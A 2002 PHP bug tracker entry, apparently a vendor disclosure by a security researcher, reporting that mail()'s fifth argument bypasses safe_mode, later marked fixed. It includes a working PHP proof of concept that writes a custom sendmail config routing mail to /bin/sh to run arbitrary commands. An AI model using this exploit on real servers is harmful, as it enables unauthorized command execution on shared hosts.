php.net |  support |  documentation |  report a bug |  advanced search |  search howto |  statistics |  random bug |  login
Bug #17745 bypassing safe_mode with mail()
Submitted: 2002-06-13 12:36 UTC Modified: 2002-07-02 09:55 UTC
From: cliph at isec dot pl Assigned:
Status: Closed Package: Mail related
PHP Version: 4.2.1 OS: Any
Private report: No CVE-ID: None
Welcome back! If you're the original bug submitter, here's where you can edit the bug or add additional notes.
If you forgot your password, you can retrieve your password here.
Password:
Status:
Package:
Bug Type:
Summary:
From: cliph at isec dot pl
New email:
PHP Version: OS:

 

 [2002-06-13 12:36 UTC] cliph at isec dot pl
If PHP is configured with safe_mode option enabled, special restriction are set up including limit on external binaries that may be executed from within a PHP script.

The 5th argument to the mail() function (introduced in version 4.0.5) allow specifying command line option to the sendmail binary. Some time ago a bug was found in the mail() function allowing to pass shell meta-characters in the 5th argument, leading to execute arbitrary shell commands or external binaries. This bug was fixed in version 4.1.0.

However, mail() function is still vulnerable because it allows to pass command line arguments to the sendmail binary which gives the ability to influence its behavior (i.e. by using non-default aliases, custom configuration files - other cases are possible with others MTAs)

Passing 5th argument should be disabled if PHP is configured in safe_mode.

Sample exploit that works with sendmail MTA:

-----8<----- bypass_safe_mode.php -----8<-----
<?
$script=tempnam("/tmp", "script");
$cf=tempnam("/tmp", "cf");

$fd = fopen($cf, "w");
fwrite($fd, "OQ/tmp
Sparse=0
R$*" . chr(9) . "$#local $@ $1 $: $1
Mlocal, P=/bin/sh, A=sh $script");
fclose($fd);

$fd = fopen($script, "w");
fwrite($fd, "rm -f $script $cf; ");
fwrite($fd, $cmd);
fclose($fd);

mail("nobody", "", "", "", "-C$cf");
?>
-----8<----- bypass_safe_mode.php -----8<-----

Regards,
Wojciech Purczynski <cliph@isec.pl>
iSEC Security Research
http://isec.pl/

Patches

Pull Requests

History

AllCommentsChangesGit/SVN commitsRelated reports
 [2002-07-02 09:55 UTC] derick@php.net
This bug has been fixed in CVS. You can grab a snapshot of the
CVS version at http://snaps.php.net/. In case this was a documentation 
problem, the fix will show up soon at http://www.php.net/manual/.
In case this was a PHP.net website problem, the change will show
up on the PHP.net site and on the mirror sites.
Thank you for the report, and for helping us make PHP better.


 
PHP Copyright © 2001-2024 The PHP Group
All rights reserved.
Last updated: Fri Dec 27 08:01:28 2024 UTC